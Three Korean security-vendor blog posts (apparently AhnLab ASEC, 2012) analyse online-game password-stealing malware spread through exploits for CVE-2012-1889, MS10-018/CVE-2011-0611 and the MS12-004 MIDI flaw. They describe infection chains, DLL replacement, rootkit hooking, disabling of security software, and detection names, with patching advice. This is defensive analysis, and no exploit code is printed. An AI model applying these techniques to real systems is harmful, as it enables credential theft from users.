ASEC에서는 6월 26일 마이크로소프트(Microsoft)의 XML 코어 서비스 취약점(CVE-2012-1889)을 악용한 공격 형태가 증가하고 있다는 안내를 한 바가 있다.


그리고  6월 28에는 해당 취약점을 악용하는 코드가 변형된 형태의 XML 코어 서비스 취약점(CVE-2012-1889) 악용하고 있는 것으로 공개한 바가 있으며, 취약한 웹 사이트를 중심으로 유포가 진행 되고 있다고 언급한 바가 있다.


현재까지도 보안 패치가 제공되지 않고 있는 제로 데이(Zero-Day, 0-Day) 취약점인 해당 XML 코어 서비스 취약점 악용형태가 지난 주말인 6월 30일과 7월 1일 이틀 사이 한국 내의 취약한 웹 사이트들을 대상으로 유포되고 있는 것이 발견되었다.


주말 사이 발견된 해당 XML 코어 서비스 취약점을 악용하는 스크립트 악성코드는 아래 이미지와 같은 형태이며, 이제까지 발견된 스크립트 악성코드와는 다르게 난독화 정도가 심하게 제작되어 있다.



해당 취약점을 악용하는 스크립트 악성코드는 최소 36개 이상의 온라인 게임 정보를 탈취하기 위한 악성코드 변형들을 유포하기 위해 제작되어 있다.


그리고 해당 취약점을 악용하는 스크립트 악성코드와 온라인 게임 정보 탈취 악성코드를 제작 및 유포하는 제작자들은 아래 이미지와 같은 툴을 이용하여 현재 자신들이 제작한 악성코드들이 정상적으로 유포 중인지 확인을 하고 있었다.



해당 툴은 악성코드 제작자들이 악성코드 유포를 위해 해킹한 시스템의 도메인 주소들을 입력하고 검색을 하게 되면 위 이미지에서와 같이 3회에 걸쳐 파일이 정상적으로 존재하는지 그리고 유포가 가능한지 확인 하게 된다.


이러한 툴이 제작되어 사용되고 있다는 것으로 미루어 악성코드 제작자들은 실시간으로 유포 중인 악성코드들의 상태를 확인하고, 하나의 유포 경로가 차단되었을 경우 다른 유포지를 가동시키기 위한 전략의 자동화를 위해 제작된 것으로 판단된다.


이 번에 발견된 해당 XML 코어 서비스 취약점을 악용하는 악성코드들 모두 V3 제품군에서 다음과 같이 진단한다.


JS/Agent

Win-Trojan/Hupe.Gen

Dropper/Hupe.Gen 
Win-Trojan/Onlinegamehack 변형들
Win-Trojan/Agent 변형들

그리고 네트워크 보안장비 트러스가드(TrusGuard) 제품군에서는 해당 난독화된 XML 코어 서비스 취약점 악용 스크립트 악성코드를 다음과 같이 탐지 및 차단이 가능하다.


http_obfuscated_javascript_fromcharcode  


앞서 언급한 바와 같이 현재 XML 코어 서비스는 마이크로소프트에서 보안 패치를 제공하지 않는 제로 데이(Zero-Day, 0-Day) 취약점이다. 


그러므로 사용하는 보안 제품을 최신 엔진으로 업데이트하고, 마이크로소프트에서 임시 방안으로 제공 중인 픽스 잇(Fix It)을 설치하는 것이 해당 취약점을 악용하는 악성코드 감염을 예방하는 방안이다.



저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원

온라인게임 사용자의 아이템과 사이버머니 탈취를 목적으로 하는 온라인게임핵이 교체하는 파일이 변경되었다. 지금까지 해당 악성코드가 변경시킨 윈도우 주요 구성파일은 imm32.dll, comres.dll, lpk.dll, ws2help.dll, version.dll 등이었으며, 작년 하반기부터 ws2help.dll를 악성코드로 교체하는 유형이 가장 많이 발견되었다. 지금도 ws2help.dll을 대상으로 하는 악성코드도 많이 발견되고 있다. 이러한 종류의 악성코드들은, 출현한지 오래되면 보안업체에서 대응하는 능력이 향상됨에 따라 감염 PC의 수가 줄어들게 된다. 이에 따라 악성코드 제작자들은 새로운 감염 대상을 물색하게 되는데, 이번에 발견된 wshtcpip.dll 파일을 교체하는 경우가 이러한 유형에 해당된다고 하겠다
 

악성코드 다운로드를 위해 사용 된 보안취약점은 IE Flash Player ActiveX 보안취약점으로 지금까지 주로 사용된 것과 동일하다. 그림 1은 취약점을 이용하여 Buffer Overflow를 유발하는 코드의 난독화를 해제한 것이다IE 6.0 또는 7.0을 사용하는 사용자를 대상으로 MS10-018 취약점을 유발시킨다.

그림 1 IE 보안취약점(MS10-018) 유발 코드


그림 2는 사용자 PC에 설치된 Flash Player ActiveX 프로그램의 버전을 확인 한 다음, CVE-2011-0611 보안취약점을 이용하기 위한 코드이다. IE 버전과 Flash Player 버전을 확인하는 코드도 함께 포함되어 있다.

그림 2 Flash Player 보안취약점(CVE-2011-0611)을 이용하기 위한 코드


해당 악성코드 감염시 웹브라우저가 정상적으로 동작하지 않고 종료된다거나, 시스템이 느려지는 증상이 발생한다. 또한 국내외 주요 보안 업체의 보안 프로그램이 정상적으로 동작하지 않는 증상이 발생한다. 지금까지 주로 변경되었던 파일들이 imm32.dll, comres.dll, lpk.dll, ws2help.dll, version.dll 등이었다면, 이번에 변경되는 파일은 wshtcpip.dll 파일이다.

 

악성코드 감염을 확인할 수 있는 방법은 아래와 같이 c:\windows\system32 폴더에서 wshtcpip.dll 파일을 찾아 확인하면 된다. 해당 파일의 크기가 20KB 내외이면 정상이지만, 악성 파일의 경우 82,432 Byte의 크기를 가지고 있으며, 파일 생성 날짜가 비교적 최신인 것을 알 수 있다. 파일 크기의 경우 앞으로 발생될 변종에 따라 달라질 수 있지만, 윈도우 주요 구성파일의 생성일자가 최근일 경우 악성코드에 감염되었거나, 감염 후 치료된 파일일 수 있으므로 의심해 볼 필요가 있다.

그림 3 악성 파일로 교체된 wshtcpip.dll 파일


정상 wshtcpip.dll 파일은 그림 4와 같이 wshtcpxp.dll 파일로 백업한다.

그림 4 wshtcpxp.dll로 백업된 wshtcpxp.dll 파일


그리고 c:\windows\system32 폴더의 safemon.dll 파일을 악성파일로 변경하고, 윈도우 추가 확장기능(BHO)에 등록된다. 국산 온라인게임의 경우 해당 게임사이트에 접속해서 게임을 실행하는 형태를 띄고 있기 때문에 이러한 과정에서 입력되는 아이디와 비밀번호를 탈취하기 위한 것으로 보인다.

그림 5 BHO로 등록된 safemon.dll 파일


그리고 해당 악성코드에 감염되면 그림 6과 같이 특정 서버로 접속해 시스템의 MAC 주소와 운영체제 버전을 전송한다. 현재 해당 IP URL은 동작하지 않는다. 일반적으로 온라인게임핵 악성코드 유포에 사용되는 URL IP 주소는 몇일 동안만 사용되고 대부분 폐기된다.

그림 6 감염 후 시스템의 정보를 전송하는 부분


현재 V3에서는 다음과 같이 진단하고 있다.

 

JS/Agent

JS/Downloader

JS/Cve-2010-0806

SWF/Cve-2011-0611

Win-Trojan/Onlinegamehack.35328.BL

Win-Trojan/Onlinegamehack.82432.CC

Win-Trojan/Onlinegamehack.139264.CV

 

보안 프로그램이 정상적으로 동작하지 않을 경우 안철수연구소에서 제공하는 전용백신을 이용하면 그림 7과 같이 진단/치료가 가능하다.

그림 7 전용백신으로 해당 악성코드를 검출한 화면


이러한 악성코드가 동작하거나 감염되는 것을 막기 위해서 다음과 같은 조치를 취해야 한다.

 

<개인>

1. 백신 프로그램의 경우 최신버전의 엔진을 사용한다.

 

2. 윈도우 XP의 경우 SP 버전 등을 확인하여 최신버전을 설치하여 사용하고, 미설치된 보안업데이트가 있을 경우 모두 설치한다.

3. IE 8.0 이상의 브라우저를 사용하거나 타사 브라우저를 사용한다.

http://update.microsoft.com/microsoftupdate/v6/default.aspx?ln=ko

위 링크 이동 후, 서비스팩 및 IE 업데이트 설치 진행

 

4. Flash Player를 비롯한 ActiveX 프로그램들은 최신 버전을 설치한다.

http://get.adobe.com/kr/flashplayer/
위 링크 이동 후, "지금 다운로드" 클릭하여 설치 진행
(
추가 프로그램 설치를 원치 않을시엔 선택사항 체크 해제 하신 후 다운로드 클릭)

5. 최근에 많이 이용되는 Java 취약점을 보완하기 위해 최신 버전의 Java 프로그램을 설치한다.

http://www.java.com/ko/
위 링크 이동 후 "무료 자바 다운로드" 클릭하여 설치 진행

 

<기업 보안관리자>

1. 백신 프로그램의 경우 최신버전의 엔진을 사용한다.

 

2. 부득이한 경우를 최소화하고, 보안업데이트 및 최신 윈도우 서비스팩를 설치한다.

 

3. 부득이한 경우를 최소화하고, IE8 버전 이상을 사용한다.

 

4. 추가 응용프로그램들의 업데이트는 아래 글을 참고한다.

http://asec.ahnlab.com/758


신고
Creative Commons License
Creative Commons License
Posted by 곰탱이푸우
2012년 1월 27일 금일 트렌드 마이크로(Trend Micro) 블로그 "Malware Leveraging MIDI Remote Code Execution Vulnerability Found"를 통해 마이크로소프트(Microsoft)에서 1월 11일 배포하였던 보안 패치인 "MS12-004  Windows Media의 취약점으로 인한 원격 코드 실행 문제점 (2636391)"와 관련된 취약점(CVE-2012-0003)을 악용하여 유포된 악성코드가 발견되었다.

해당 MS12-004 취약점을 악용하여 유포된 악성코드와 관련된 사항들을 ASEC에서 추가적인 조사를 진행하는 과정에서 해당 악성코드는 아래와 같은 전체적이 구조를 가지고 있는 것으로 파악하였다.


악성코드 감염의 근본적인 시작이 되는 mp.html(16,453 바이트) 파일은 최초 1월 21일 설날 연휴가 시작되는 토요일 국내에서 발견되었으며, 해당 스크립트 악성코드가 존재하였던 시스템은 미국에 위치하고 있다.

그리고 해당 악성코드들과 관련된 공격자는 한국과 중국을 포함한 극동 아시아 권을 주된 대상으로 해당 악성코드들을 유포 한 것으로 ASEC에서는 추정하고 있다. 


해당 mp.html 스크립트 악성코드를 텍스트 에디터로 분석을 해보면 아래와 같은 구조를 가지고 있으며, 파일 중간에는 실질적인 MS12-004 취약점을 악용하는 MIDI 파일인 baby.mid(38,068 바이트) 파일과 다른 자바 스크립트(JavaScript)인 i.js와 쉘코드(Shallcode)가 포함되어 있다.


아래 이미지와 동일한 MIDI 파일인 baby.mid는 MS12-004 취약점을 악용하도록 되어 있으며, 해당 취약점을 통해 ASLR/DEP를 모두 우회하여 공격자가 지정한 특정 코드를 실행 할 수 있도록 되어 있다. 

일반적인 MIDI 파일 포맷은 Header Chunk 와 Track Chunks로 구성되어 있다. 그러나 이번에 발견된 악의적으로 조작된 MIDI 파일에서 Note On/OFF (소리내기/끄기) 명령어인 해당 Track Event 중 첫번째 파라미터인 "Note Number" 값은 최대 127까지 표현가능하다.  

그러므로, 아래 이미지와 같이 B2(>128) 값으로 설정된 경우에는 오프셋(Offset) 계산 시 경계 범위를 넘게되어 잘못된 메모리 번지를 참조하게 되는 오류가 발생하게 된다.


mp.html 스크립트 악성코드에 포함되어 있는 쉘코드는 미국에 위치한 특정 시스템에서 인코딩(Encoding) 되어 있는 파일인 tdc.exe(73,728 바이트) 를 다운로드 한 후에 다시 이를 디코딩(Decoding) 과정을 거쳐 정상적인 PE 파일 형태를 가지게 된다.


정상적인 PE 파일 형태를 가지게 된 tdc.exe 파일이 실행되면 다음의 파일들을 생성하게 된다.

C:\WINDOWS\system32\drivers\com32.sys (11,648 바이트)
C:\WINDOWS\system32\com32.dll (57,344 바이트)


레지스트리(Registry)에 다음의 키 값을 생성하여 윈도우(Windows)가 재시작 시에 해당 드라이버 파일이 "Com32"라는 서비스명으로 자동 구동 되도록 설정하게 된다.

HKLM\SYSTEM\ControlSet001\Services\Com32\ImagePath  
"System32\drivers\com32.sys"


생성된 드라이버 파일인 com32.sys tdc.exe가 생성한 com32.syscom32.dll 파일들을 보호하기 위해 다른 프로세스의 접근을 방해한다. 그러나 다음의 프로세스들의 접근에 대해서는 허용하고 있다.

IEXPLORER.EXE
exploere.exe
rundll32.exe 


그리고 com32.sys는 \FileSystem\FastFat 과 \FileSystem\Ntfs의 DriverObject의 IRP_MJ_CREATE 핸들러 주소를 후킹한 코드 주소로 변경하는 방법을 사용하고 있다.

생성된 com32.dll는 감염된 시스템에서 국내에서 제작되어 사용중인 보안 제품들이 실행 중이라면 해당 프로세스들의 강제 종료를 시도하게 된다.


추가적으로 아래 이미지와 같이 특정 시스템으로 접속을 시도하여 성공하게 될 경우에는 아래 이미지와 같이 20120120.exe(89,088 바이트)를 다운로드 하게 된다.


다운로드 된 20120120.exe는 감염된 시스템에 존재하는 정상 윈도우 시스템 파일인 imm32.dll 파일을 랜덤한 파일명으로 백업을하고 국내에서 제작된 온라인 게임들의 사용자 계정과 암호를 외부로 탈취하는 기능들을 수행하게 된다.

현재까지의 상황들을 종합해보면 이번 MS12-004 취약점을 악용하여 악성코드 감염을 시도하는 제작자는 최종적으로 윈도우 보안 패치가 설치되지 않은 시스템에서 온라인 게임 사용자 정보들을 탈취하기 위한 악성코드 감염을 시도한 사례라고 볼 수 있다.

발견된 악성코드의 제작 기법과 국내 보안 프로그램의 강제 종료 기법들을 볼 때 중국에서 제작된 온라인 게임 관련 악성코드와 유사도가 높다고 할 수 있다.

그러므로 해당 MS12-004 취약점은 다른 악성코드 변형들에서도 다른 형태의 유포 기법으로 악용될 소지가 높음으로 사용하는 윈도우 시스템에 최신 보안 패치들을 모두 설치하는 것이 최선의 예방책이다.

이번 MS12-004 취약점과 관련된 악성코드들 모두 V3 제품군에서는 다음과 같이 진단한다.

JS/Cve-2009-0075 
JS/Agent 
Exploit/Ms12-004 
Win-Trojan/Rootkit.7808.H 
Dropper/Win32.OnlineGameHack 
Win-Trojan/Meredrop.73728.C
Win-Trojan/Rootkit.11648.B
Win-Trojan/Waltrodock.57344
Win-Trojan/Meredrop

그리고 TrusGuard 네트워크 보안 장비에서도 해당 취약점에 대해 다음의 명칭으로 탐지 및 차단이 가능하다. 

malicious_url_20120127_1459(HTTP)-1
ms_ie_mid_file_exploit-t(CVE-2012-0003/HTTP)

저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원